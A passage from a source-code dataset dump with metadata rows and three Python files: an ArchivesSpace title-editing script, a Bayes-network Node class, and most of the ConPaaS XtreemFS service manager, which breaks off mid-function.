0ad6f1346df52e12739f27b54570586af4362559
|
[
"MIT"
] | null | null | null |
import requests
import json
aspace_url = 'http://localhost:8089'
username = 'admin'
password = 'admin'
repo_num = '2'
auth = requests.post(aspace_url+'/users/'+username+'/login?password='+password).json()
session = auth["session"]
headers = {'X-ArchivesSpace-Session':session}
for d in range(1,6):
resource_json = requests.get(aspace_url+'/repositories/'+repo_num+'/resources/'+str(d), headers=headers).json()
resource_title = resource_json['title']
print 'Current title is: ' +resource_title
if 'Papers' in resource_title:
resource_json["title"] = resource_json['title'].replace(" Papers"," papers")
updated = requests.post(aspace_url+'/repositories/'+repo_num+'/resources/'+str(d), headers=headers, data=json.dumps(resource_json))
print 'New title is: ' + resource_json["title"]
| 37.809524
| 133
| 0.730479
|
import requests
import json
aspace_url = 'http://localhost:8089'
username = 'admin'
password = 'admin'
repo_num = '2'
auth = requests.post(aspace_url+'/users/'+username+'/login?password='+password).json()
session = auth["session"]
headers = {'X-ArchivesSpace-Session':session}
for d in range(1,6):
resource_json = requests.get(aspace_url+'/repositories/'+repo_num+'/resources/'+str(d), headers=headers).json()
resource_title = resource_json['title']
print 'Current title is: ' +resource_title
if 'Papers' in resource_title:
resource_json["title"] = resource_json['title'].replace(" Papers"," papers")
updated = requests.post(aspace_url+'/repositories/'+repo_num+'/resources/'+str(d), headers=headers, data=json.dumps(resource_json))
print 'New title is: ' + resource_json["title"]
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
2abcfcc2281955e4ae7cbe49ec5370d4ae3c495c
| 540
|
py
|
Python
|
Node.py
|
akshaykamath/Bayes-Network-Inference-Algorithms
|
3a0867130dd74bf2444a7ce4f972fff6b1a989dc
|
[
"MIT"
] | null | null | null |
Node.py
|
akshaykamath/Bayes-Network-Inference-Algorithms
|
3a0867130dd74bf2444a7ce4f972fff6b1a989dc
|
[
"MIT"
] | null | null | null |
Node.py
|
akshaykamath/Bayes-Network-Inference-Algorithms
|
3a0867130dd74bf2444a7ce4f972fff6b1a989dc
|
[
"MIT"
] | null | null | null |
__author__ = 'Akshay'
| 21.6
| 48
| 0.625926
|
__author__ = 'Akshay'
class Node:
initial_time = 0
finish_time = 0
name = None
child_nodes = None
parent_nodes = None
conditional_probability_table = {}
def __init__(self, nm):
self.name = nm
self.parent_distance = 0
self.child_nodes = []
self.parent_nodes = []
def add_child(self, node=None, weight=None):
self.child_nodes.append((node, weight))
node.parent_nodes.append(self)
def has_child(self, node=None):
        return any(child is node for child, _ in self.child_nodes)  # child_nodes holds (node, weight) tuples
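# Illustrative usage (not in the original file): children are stored as (node, weight)
# tuples, parents as plain Node references.
if __name__ == "__main__":
    rain = Node("Rain")
    wet_grass = Node("WetGrass")
    rain.add_child(wet_grass, 0.9)
    print(rain.has_child(wet_grass))        # True
    print(wet_grass.parent_nodes[0].name)   # Rain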
| 0
| 0
| 0
| 493
| 0
| 0
| 0
| 0
| 23
|
90d1a8e84d85bc7f4e6d8664cd0c5d4332376007
| 38,126
|
py
|
Python
|
conpaas-services/src/conpaas/services/xtreemfs/manager/manager.py
|
bopopescu/conpaas
|
e0a2955ae3e7da7525d799bed411e9f76ecf0919
|
[
"BSD-3-Clause"
] | 1
|
2015-09-20T18:20:01.000Z
|
2015-09-20T18:20:01.000Z
|
conpaas-services/src/conpaas/services/xtreemfs/manager/manager.py
|
bopopescu/conpaas
|
e0a2955ae3e7da7525d799bed411e9f76ecf0919
|
[
"BSD-3-Clause"
] | 1
|
2020-07-27T11:56:18.000Z
|
2020-07-27T11:56:18.000Z
|
conpaas-services/src/conpaas/services/xtreemfs/manager/manager.py
|
bopopescu/conpaas
|
e0a2955ae3e7da7525d799bed411e9f76ecf0919
|
[
"BSD-3-Clause"
] | 3
|
2018-09-14T16:54:14.000Z
|
2020-07-26T03:14:56.000Z
|
# -*- coding: utf-8 -*-
"""
:copyright: (C) 2010-2013 by Contrail Consortium.
"""
| 38.864424
| 138
| 0.577087
|
# -*- coding: utf-8 -*-
"""
:copyright: (C) 2010-2013 by Contrail Consortium.
"""
from threading import Thread
from conpaas.core.expose import expose
from conpaas.core.manager import BaseManager
from conpaas.core.manager import ManagerException
from conpaas.core.https.server import HttpJsonResponse, HttpErrorResponse
from conpaas.services.xtreemfs.agent import client
import uuid
import base64
import subprocess
def invalid_arg(msg):
return HttpErrorResponse(ManagerException(
ManagerException.E_ARGS_INVALID, detail=msg).message)
class XtreemFSManager(BaseManager):
def __init__(self, config_parser, **kwargs):
BaseManager.__init__(self, config_parser)
# node lists
self.nodes = [] # all nodes
self.osdNodes = [] # only the OSD nodes
self.mrcNodes = [] # onle the MRC nodes
self.dirNodes = [] # only the DIR nodes
# node counters
self.dirCount = 0
self.mrcCount = 0
self.osdCount = 0
# wether we want to keep storage volumes upon OSD nodes deletion
self.persistent = False
# default value for OSD volume size
self.osd_volume_size = 1024
# dictionaries mapping node IDs to uuids
self.dir_node_uuid_map = {}
self.mrc_node_uuid_map = {}
self.osd_node_uuid_map = {}
# dictionary mapping osd uuids to volume IDs
self.osd_uuid_volume_map = {}
# Setup the clouds' controller
self.controller.generate_context('xtreemfs')
def __get__uuid(self, node_id, node_type):
if node_type == 'dir':
node_map = self.dir_node_uuid_map
elif node_type == 'mrc':
node_map = self.mrc_node_uuid_map
elif node_type == 'osd':
node_map = self.osd_node_uuid_map
else:
raise Exception("Unknown node type: %s" % node_type)
node_uuid = node_map.get(node_id)
if node_uuid:
self.logger.debug("%s already has a uuid (%s) -> %s" % (node_id,
node_type, node_uuid))
else:
node_uuid = str(uuid.uuid1())
node_map[node_id] = node_uuid
self.logger.debug("New uuid for %s (%s) -> %s" % (node_id,
node_type, node_uuid))
return node_uuid
def _start_dir(self, nodes):
self.logger.debug("_start_dir(%s)" % nodes)
for node in nodes:
try:
dir_uuid = self.__get__uuid(node.id, 'dir')
client.createDIR(node.ip, 5555, dir_uuid)
except client.AgentException:
self.logger.exception('Failed to start DIR at node %s' % node)
self.state = self.S_ERROR
raise
def _stop_dir(self, nodes, remove):
for node in nodes:
try:
client.stopDIR(node.ip, 5555)
except client.AgentException:
self.logger.exception('Failed to stop DIR at node %s' % node)
self.state = self.S_ERROR
raise
if remove:
del self.dir_node_uuid_map[node.id]
def _start_mrc(self, nodes):
for node in nodes:
try:
mrc_uuid = self.__get__uuid(node.id, 'mrc')
client.createMRC(node.ip, 5555, self.dirNodes[0].ip, mrc_uuid)
except client.AgentException:
self.logger.exception('Failed to start MRC at node %s' % node)
self.state = self.S_ERROR
raise
def _stop_mrc(self, nodes, remove):
for node in nodes:
try:
client.stopMRC(node.ip, 5555)
except client.AgentException:
self.logger.exception('Failed to stop MRC at node %s' % node)
self.state = self.S_ERROR
raise
if remove:
del self.mrc_node_uuid_map[node.id]
def _start_osd(self, nodes, cloud=None):
for idx, node in enumerate(nodes):
osd_uuid = self.__get__uuid(node.id, 'osd')
volume_associated = osd_uuid in self.osd_uuid_volume_map
# We need a storage volume for each OSD node. Check if this OSD
# node needs a new volume to be created.
if volume_associated:
# No need to create a new volume.
volume = self.get_volume(self.osd_uuid_volume_map[osd_uuid])
self.logger.debug(
'%s already has an associated storage volume (%s)' %
(osd_uuid, volume.id))
else:
# We need to create a new volume.
volume_name = "osd-%s" % osd_uuid
volume = self.create_volume(self.osd_volume_size, volume_name,
node.id, cloud)
self.osd_uuid_volume_map[osd_uuid] = volume.id
try:
self.attach_volume(volume.id, node.id, "sdb")
except Exception, err:
self.logger.error("attach_volume: %s" % err)
try:
client.createOSD(node.ip, 5555, self.dirNodes[0].ip, osd_uuid,
mkfs=not volume_associated)
except client.AgentException:
self.logger.exception('Failed to start OSD at node %s' % node)
self.state = self.S_ERROR
raise
def _stop_osd(self, nodes, remove, drain):
"""Stop OSD service on the given nodes.
The volume is always detached.
If remove is True, the volume is destroyed and node and volume are
deleted from internal data structures.
If drain is True, data is moved to other OSDs."""
for node in nodes:
try:
client.stopOSD(node.ip, 5555, drain)
except client.AgentException:
self.logger.exception('Failed to stop OSD at node %s' % node)
self.state = self.S_ERROR
raise
volume_id = self.osd_uuid_volume_map[self.osd_node_uuid_map[node.id]]
self.detach_volume(volume_id)
# destroy volumes and delete entries from internal state
if remove:
self.destroy_volume(volume_id)
del self.osd_uuid_volume_map[self.osd_node_uuid_map[node.id]]
del self.osd_node_uuid_map[node.id]
else:
self.logger.debug('Not destroying volume %s' % volume_id)
def _do_startup(self, cloud, resuming=False):
"""Starts up the service. The first nodes will contain all services.
If 'resuming' is set to True, we do not start XtreemFS services now.
set_service_snapshot will do that.
"""
startCloud = self._init_cloud(cloud)
try:
# NOTE: The following service structure is enforce:
# - the first node contains a DIR, MRC and OSD,
# those services can not be removed
# - added DIR, MRC and OSD services will all run
# on exclusive nodes
# - all explicitly added services can be removed
# create 1 node
node_instances = self.controller.create_nodes(1,
client.check_agent_process, 5555, startCloud)
# use this node for DIR, MRC and OSD
self.nodes += node_instances
self.dirNodes += node_instances
self.mrcNodes += node_instances
self.osdNodes += node_instances
# start DIR, MRC, OSD
if not resuming:
self._start_dir(self.dirNodes)
self._start_mrc(self.mrcNodes)
self._start_osd(self.osdNodes, startCloud)
# at the startup the DIR node will have all the services
self.dirCount = 1
self.mrcCount = 1
self.osdCount = 1
self.logger.info('Created 1 node with DIR, MRC and OSD services')
except:
self.logger.exception('do_startup: Failed to request a new node')
self.state = self.S_STOPPED
return
self.logger.info('XtreemFS service was started up')
self.state = self.S_RUNNING
@expose('POST')
def shutdown(self, kwargs):
self.state = self.S_EPILOGUE
# start _do_shutdown(stop_services=True) in a thread
Thread(target=self._do_shutdown, args=[True]).start()
return HttpJsonResponse()
def _start_all(self):
self._start_dir(self.dirNodes)
self._start_mrc(self.mrcNodes)
self._start_osd(self.osdNodes)
def _stop_all(self, remove=True):
"""Stop all xtreemfs services on all agents (first osd, then mrc, then
dir)."""
# do not drain (move data to other OSDs), since we stop all
self._stop_osd(self.osdNodes, remove=remove, drain=False)
self._stop_mrc(self.mrcNodes, remove=remove)
self._stop_dir(self.dirNodes, remove=remove)
def _do_shutdown(self, stop_services=False):
# check if we need to stop the services or not, i.e. when called at
# the end of get_snapshot()
if stop_services:
self._stop_all(remove=True)
self.controller.delete_nodes(self.nodes)
self.nodes = []
self.dirNodes = []
self.mrcNodes = []
self.osdNodes = []
self.dirCount = 0
self.mrcCount = 0
self.osdCount = 0
self.dir_node_uuid_map = {}
self.mrc_node_uuid_map = {}
self.osd_node_uuid_map = {}
self.osd_uuid_volume_map = {}
self.state = self.S_STOPPED
return HttpJsonResponse()
@expose('POST')
def add_nodes(self, kwargs):
#self.controller.add_context_replacement(dict(STRING='xtreemfs'))
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to add_nodes')
nr_dir = 0
nr_mrc = 0
nr_osd = 0
resuming = False;
if 'resuming' in kwargs:
resuming = kwargs['resuming']
# Adding DIR Nodes
if 'dir' in kwargs:
if not isinstance(kwargs['dir'], int):
return invalid_arg('Expected an integer value for "dir"')
nr_dir = int(kwargs.pop('dir'))
if nr_dir < 0:
return invalid_arg('Expected a positive integer value for "dir"')
# Adding MRC Nodes
if 'mrc' in kwargs:
if not isinstance(kwargs['mrc'], int):
return invalid_arg('Expected an integer value for "mrc"')
nr_mrc = int(kwargs.pop('mrc'))
if nr_mrc < 0:
return invalid_arg('Expected a positive integer value for "mrc"')
# TODO: 'osd' is no longer required, when adding other services is supported
if not 'osd' in kwargs:
return HttpErrorResponse('ERROR: Required argument doesn\'t exist')
if not isinstance(kwargs['osd'], int):
return HttpErrorResponse('ERROR: Expected an integer value for "osd"')
nr_osd = int(kwargs.pop('osd'))
if nr_osd < 0:
return invalid_arg('Expected a positive integer value for "nr osd"')
self.state = self.S_ADAPTING
Thread(target=self._do_add_nodes, args=[nr_dir, nr_mrc, nr_osd, kwargs['cloud'], resuming]).start()
return HttpJsonResponse()
# TODO: currently not used
def KillOsd(self, nodes):
for node in nodes:
client.stopOSD(node.ip, 5555)
self.osdNodes.remove(node)
def _do_add_nodes(self, nr_dir, nr_mrc, nr_osd, cloud, resuming=False):
startCloud = self._init_cloud(cloud)
totalNodes = nr_dir + nr_mrc + nr_osd
# try to create totalNodes new nodes
try:
node_instances = self.controller.create_nodes(totalNodes,
client.check_agent_process, 5555, startCloud)
except:
self.logger.exception('_do_add_nodes: Failed to request a new node')
self.state = self.S_STOPPED
return
self.nodes += node_instances
dirNodesAdded = node_instances[:nr_dir]
self.dirNodes += dirNodesAdded
mrcNodesAdded = node_instances[nr_dir:nr_mrc+nr_dir]
self.mrcNodes += mrcNodesAdded
osdNodesAdded = node_instances[nr_mrc+nr_dir:]
self.osdNodes += osdNodesAdded
# TODO: maybe re-enable when OSD-removal moves data to another node before shutting down the service.
#KilledOsdNodes = []
# The first node will contain the OSD service so it will be removed
# from there
#if nr_osd > 0 and self.osdCount == 0:
# KilledOsdNodes.append(self.dirNodes[0])
#self.KillOsd(KilledOsdNodes)
# Startup DIR agents
for node in dirNodesAdded:
client.startup(node.ip, 5555)
data = client.createDIR(node.ip, 5555)
self.logger.info('Received %s from %s', data, node.id)
self.dirCount += 1
# Startup MRC agents
for node in mrcNodesAdded:
client.startup(node.ip, 5555)
data = client.createMRC(node.ip, 5555, self.dirNodes[0].ip)
self.logger.info('Received %s from %s', data, node.id)
self.mrcCount += 1
# Startup OSD agents (if not resuming)
if not resuming:
self._start_osd(osdNodesAdded, startCloud)
self.osdCount += len(osdNodesAdded)
#for node in osdNodesAdded:
# client.startup(node.ip, 5555)
# data = client.createOSD(node.ip, 5555, self.dirNodes[0].ip)
# self.logger.info('Received %s from %s', data, node.id)
# self.osdCount += 1
self.state = self.S_RUNNING
return HttpJsonResponse()
@expose('GET')
def list_nodes(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpected')
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to list_nodes')
return HttpJsonResponse({
'dir': [node.id for node in self.dirNodes ],
'mrc': [node.id for node in self.mrcNodes],
'osd': [node.id for node in self.osdNodes]
})
@expose('GET')
def get_service_info(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpected')
return HttpJsonResponse({
'state': self.state,
'type': 'xtreemfs',
'persistent': self.persistent,
'osd_volume_size': self.osd_volume_size
})
@expose('GET')
def get_node_info(self, kwargs):
if 'serviceNodeId' not in kwargs:
return HttpErrorResponse('ERROR: Missing arguments')
serviceNodeId = kwargs.pop('serviceNodeId')
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpected')
serviceNode = None
for node in self.nodes:
if serviceNodeId == node.id:
serviceNode = node
break
if serviceNode is None:
return HttpErrorResponse('ERROR: Invalid arguments')
return HttpJsonResponse({
'serviceNode': {
'id': serviceNode.id,
'ip': serviceNode.ip,
'dir': serviceNode in self.dirNodes,
'mrc': serviceNode in self.mrcNodes,
'osd': serviceNode in self.osdNodes
}
})
@expose('POST')
def remove_nodes(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to remove_nodes')
nr_dir = 0
nr_mrc = 0
nr_osd = 0
# Removing DIR Nodes
if 'dir' in kwargs:
if not isinstance(kwargs['dir'], int):
return invalid_arg('Expected an integer value for "dir"')
nr_dir = int(kwargs.pop('dir'))
if nr_dir < 0:
return invalid_arg('Expected a positive integer value for "dir"')
if nr_dir > self.dirCount - 1: # we need at least 1 DIR
return invalid_arg('Cannot remove_nodes that many DIR nodes')
# Removing MRC nodes
if 'mrc' in kwargs:
if not isinstance(kwargs['mrc'], int):
return invalid_arg('Expected an integer value for "mrc"')
nr_mrc = int(kwargs.pop('mrc'))
if nr_mrc < 0:
return invalid_arg('Expected a positive integer value for "mrc"')
if nr_mrc > self.mrcCount - 1: # we need at least 1 MRC
return invalid_arg('Cannot remove_nodes that many MRC nodes')
# TODO: 'osd' is no longer required, when removing other services is supported
if not 'osd' in kwargs:
return HttpErrorResponse('ERROR: Required argument doesn\'t exist')
if not isinstance(kwargs['osd'], int):
return HttpErrorResponse(
'ERROR: Expected an integer value for "osd"')
nr_osd = int(kwargs.pop('osd'))
if nr_osd < 0:
return invalid_arg('Expected a positive integer value for "osd"')
if nr_osd > self.osdCount - 1: # we need at least 1 OSD
return invalid_arg('Cannot remove_nodes that many OSD nodes')
self.state = self.S_ADAPTING
Thread(target=self._do_remove_nodes, args=[nr_dir, nr_mrc, nr_osd]).start()
return HttpJsonResponse()
def _do_remove_nodes(self, nr_dir, nr_mrc, nr_osd):
# NOTE: the logically unremovable first node which contains all
# services is ignored by using 1 instead of 0 in:
# for _ in range(0, nr_[dir|mrc|osd]):
# node = self.[dir|mrc|osd]Nodes.pop(1)
if nr_dir > 0:
for _ in range(0, nr_dir):
node = self.dirNodes.pop(1)
self._stop_dir([node], remove=True)
self.controller.delete_nodes([node])
self.nodes.remove(node)
self.dirCount -= nr_osd
if nr_mrc > 0:
for _ in range(0, nr_mrc):
node = self.mrcNodes.pop(1)
self._stop_mrc([node], remove=True)
self.controller.delete_nodes([node])
self.nodes.remove(node)
self.mrcCount -= nr_mrc
if nr_osd > 0:
for _ in range(0, nr_osd):
node = self.osdNodes.pop(1)
self._stop_osd([node], remove=True, drain=True)
self.controller.delete_nodes([node])
self.nodes.remove(node)
self.osdCount -= nr_osd
self.state = self.S_RUNNING
# TODO: maybe re-enable when OSD-removal moves data to another node before shutting down the service.
# if there are no more OSD nodes we need to start OSD service on the
# DIR node
#if self.osdCount == 0:
# self.osdNodes.append(self.dirNodes[0])
# self._start_osd(self.dirNodes)
return HttpJsonResponse()
@expose('POST')
def createMRC(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to create MRC service')
# Just createMRC from all the agents
for node in self.nodes:
data = client.createMRC(node.ip, 5555, self.dirNodes[0].ip)
self.logger.info('Received %s from %s', data, node.id)
return HttpJsonResponse({
'xtreemfs': [ node.id for node in self.nodes ],
})
@expose('POST')
def createDIR(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to create DIR service')
# Just createDIR from all the agents
for node in self.nodes:
data = client.createDIR(node.ip, 5555)
self.logger.info('Received %s from %s', data, node.id)
return HttpJsonResponse({
'xtreemfs': [ node.id for node in self.nodes ],
})
@expose('POST')
def createOSD(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to create OSD service')
# Just createOSD from all the agents
for node in self.nodes:
data = client.createOSD(node.ip, 5555, self.dirNodes[0].ip)
self.logger.info('Received %s from %s', data, node.id)
return HttpJsonResponse({
'xtreemfs': [ node.id for node in self.nodes ],
})
@expose('POST')
def createVolume(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to create Volume')
if not 'volumeName' in kwargs:
return HttpErrorResponse(
'ERROR: Required argument (volumeName) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
# Get the value of 'owner', if specified. 'xtreemfs' otherwise
owner = kwargs.pop('owner', 'xtreemfs')
args = [ 'mkfs.xtreemfs',
'%s:32636/%s' % (self.mrcNodes[0].ip, volumeName),
"-u", owner,
"-g", owner,
"-m", "777" ]
process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to create volume: %s; %s', stdout, stderr)
return HttpErrorResponse("The volume could not be created")
self.logger.info('Creating Volume: %s; %s', stdout, stderr)
return HttpJsonResponse()
@expose('POST')
def deleteVolume(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to delete Volume')
if not 'volumeName' in kwargs:
return HttpErrorResponse(
'ERROR: Required argument (volumeName) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
args = [ 'rmfs.xtreemfs',
'-f',
'%s:32636/%s' % (self.mrcNodes[0].ip, volumeName) ]
process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to delete volume: %s; %s', stdout, stderr)
return HttpErrorResponse("The volume could not be deleted")
self.logger.info('Deleting Volume: %s; %s', stdout, stderr)
# TODO(maybe): issue xtfs_cleanup on all OSDs to free space (or don't and assume xtfs_cleanup is run by a cron job or something)
return HttpJsonResponse()
@expose('GET')
def listVolumes(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpetced')
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to view volumes')
args = [ 'lsfs.xtreemfs', self.mrcNodes[0].ip + ':32636' ]
process = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to view volume: %s; %s', stdout, stderr)
return HttpErrorResponse("The volume list cannot be accessed")
return HttpJsonResponse({ 'volumes': stdout })
# NOTE: see xtfsutil for the available policies
@expose('GET')
def list_striping_policies(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpetced')
return HttpJsonResponse({ 'policies': "RAID0" })
@expose('GET')
def list_replication_policies(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpetced')
return HttpJsonResponse({ 'policies': "ronly, WaR1, WqRq" })
@expose('GET')
def list_osd_sel_policies(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpetced')
return HttpJsonResponse({ 'policies': "DEFAULT, FQDN, UUID, DCMAP, VIVALDI" })
@expose('GET')
def list_replica_sel_policies(self, kwargs):
if len(kwargs) != 0:
return HttpErrorResponse('ERROR: Arguments unexpetced')
return HttpJsonResponse({ 'policies': "DEFAULT, FQDN, DCMAP, VIVALDI" })
def set_policy(self, volumeName, policyName, args):
mountPoint = '/tmp/' + volumeName
# mkdir -p <mountpoint>
process = subprocess.Popen(['mkdir', '-p', mountPoint])
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# mount.xtreemfs <dir_ip>:32638/<volumename> <mountpoint>
process = subprocess.Popen(['mount.xtreemfs',
'%s:32638/%s' % (self.dirNodes[0].ip, volumeName),
mountPoint],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# # with python 2.7
# try:
# # mkdir -p <mountpoint>
# subprocess.check_output(['mkdir', '-p', mountPoint])
# # mount.xtreemfs <dir_ip>:32638/<volumename> <mountpoint>
# subprocess.check_output(['mount.xtreemfs',
# '%s:32638/%s' % (self.dirNodes[0].ip, volumeName),
# mountPoint],
# stdout=subprocess.STDOUT)
# except subprocess.CalledProcessError as e:
# return HttpErrorResponse('ERROR: could not mount volume: ' + e.output)
# xtfsutil <mountpoint> args
process = subprocess.Popen(['xtfsutil', mountPoint] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout_xtfsutil, stderr_xtfsutil) = (stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# umount <mountpoint>
process = subprocess.Popen(['umount', mountPoint],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# rmdir <mountpoint>
process = subprocess.Popen(['rmdir', mountPoint])
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# # with python 2.7
# try:
# # umount <mountpoint>
# subprocess.check_output(['umount', mountPoint])
# # fusermount -u <mountpoint>
# #subprocess.check_output(['fusermount', '-u', mountPoint])
# # rmdir <mountpoint>
# subprocess.check_output(['rmdir', mountPoint])
# except subprocess.CalledProcessError as e:
# return HttpErrorResponse('ERROR: could not unmount volume: ' + e.output)
self.logger.info('Setting %s policy: %s; %s', policyName, stdout_xtfsutil, stderr_xtfsutil)
return HttpJsonResponse({ 'stdout': stdout_xtfsutil })
@expose('POST')
def set_osd_sel_policy(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to set OSD selection policy.')
if not 'volumeName' in kwargs:
return HttpErrorResponse('ERROR: Required argument (volumeName) doesn\'t exist')
if not 'policy' in kwargs:
return HttpErrorResponse('ERROR: Required argument (policy) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
policy = kwargs.pop('policy')
# xtfsutil <path> --set-osp <policy>
args = [ '--set-osp', policy ]
return self.set_policy(volumeName, 'OSD selection', args)
@expose('POST')
def set_replica_sel_policy(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to set Replica selection policy.')
if not 'volumeName' in kwargs:
return HttpErrorResponse('ERROR: Required argument (volumeName) doesn\'t exist')
if not 'policy' in kwargs:
return HttpErrorResponse('ERROR: Required argument (policy) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
policy = kwargs.pop('policy')
# xtfsutil <path> --set-rsp <policy>
args = [ '--set-rsp', policy ]
return self.set_policy(volumeName, 'Replica selection', args)
@expose('POST')
def set_replication_policy(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to set Replication policy.')
if not 'volumeName' in kwargs:
return HttpErrorResponse('ERROR: Required argument (volumeName) doesn\'t exist')
if not 'policy' in kwargs:
return HttpErrorResponse('ERROR: Required argument (policy) doesn\'t exist')
if not 'factor' in kwargs:
return HttpErrorResponse('ERROR: Required argument (factor) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
policy = kwargs.pop('policy')
factor = kwargs.pop('factor')
# xtfsutil <path> --set-drp --replication-policy <policy> --replication-factor <factor>
args = [ '--set-drp',
'--replication-policy', policy,
'--replication-factor', factor ]
return self.set_policy(volumeName, 'Replication', args)
@expose('POST')
def set_striping_policy(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to set Striping policy.')
if not 'volumeName' in kwargs:
return HttpErrorResponse('ERROR: Required argument (volumeName) doesn\'t exist')
if not 'policy' in kwargs:
return HttpErrorResponse('ERROR: Required argument (policy) doesn\'t exist')
if not 'width' in kwargs:
return HttpErrorResponse('ERROR: Required argument (width) doesn\'t exist')
if not 'stripe-size' in kwargs:
return HttpErrorResponse('ERROR: Required argument (stripe-size) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
policy = kwargs.pop('policy')
width = kwargs.pop('width')
stripe_size = kwargs.pop('stripe-size')
# xtfsutil <path> --set-dsp --striping-policy <policy> --striping-policy-width <width> --striping-policy-stripe-size <stripe-size>
args = [ '--set-dsp',
'--striping-policy', policy,
'--striping-policy-width', width,
'--striping-policy-stripe-size', stripe_size ]
return self.set_policy(volumeName, 'Striping', args)
@expose('POST')
def toggle_persistent(self, kwargs):
self.persistent = not self.persistent
self.logger.debug('toggle_persistent: %s' % self.persistent)
return self.get_service_info({})
@expose('POST')
def set_osd_size(self, kwargs):
if not 'size' in kwargs:
return HttpErrorResponse("ERROR: Required argument (size) doesn't exist")
try:
self.osd_volume_size = int(kwargs['size'])
self.logger.debug('set_osd_size: %s' % self.osd_volume_size)
return self.get_service_info({})
except ValueError:
return HttpErrorResponse("ERROR: Required argument (size) should be an integer")
@expose('POST')
def get_service_snapshot(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse(
'ERROR: Wrong state to get service snapshot.')
self.state = self.S_EPILOGUE
# stop all agent services
self.logger.debug("Stopping all agent services")
self._stop_all(remove=False)
self.logger.debug("Calling get_snapshot on agents")
# dictionary mapping node IDs to tuples of uuids/None (DIR, MRC, OSD)
nodes_snapshot = {}
for node in self.nodes:
if node.id not in nodes_snapshot:
nodes_snapshot[node.id] = {
'data': None,
'dir_uuid': self.dir_node_uuid_map.get(node.id),
'mrc_uuid': self.mrc_node_uuid_map.get(node.id),
'osd_uuid': self.osd_node_uuid_map.get(node.id)
}
try:
# get snapshot from this agent node, independent of what
# XtreemFS services are running there
data = client.get_snapshot(node.ip, 5555)
self.logger.debug('get_snapshot(%s) HTTP code: %s' % (node.ip,
data[0]))
nodes_snapshot[node.id]['data'] = base64.b64encode(data[1])
except client.AgentException:
self.logger.exception('Failed to get snapshot from node %s' %
node)
self.state = self.S_ERROR
raise
# Get ID of attached volume
volume_id = self.osd_uuid_volume_map.get(
nodes_snapshot[node.id]['osd_uuid'])
nodes_snapshot[node.id]['volume'] = volume_id
if volume_id:
volume = self.get_volume(volume_id)
nodes_snapshot[node.id]['cloud'] = volume.cloud.cloud_name
for key in 'dir_uuid', 'mrc_uuid', 'osd_uuid', 'volume':
self.logger.debug("nodes_snapshot[%s]['%s']: %s" % (node.id,
key, nodes_snapshot[node.id][key]))
self.logger.debug("Shutting all agents down")
self._do_shutdown(stop_services=False)
return HttpJsonResponse(nodes_snapshot.values())
@expose('POST')
def set_service_snapshot(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse(
'ERROR: Wrong state to set service snapshot.')
if not 'nodes' in kwargs:
return HttpErrorResponse(
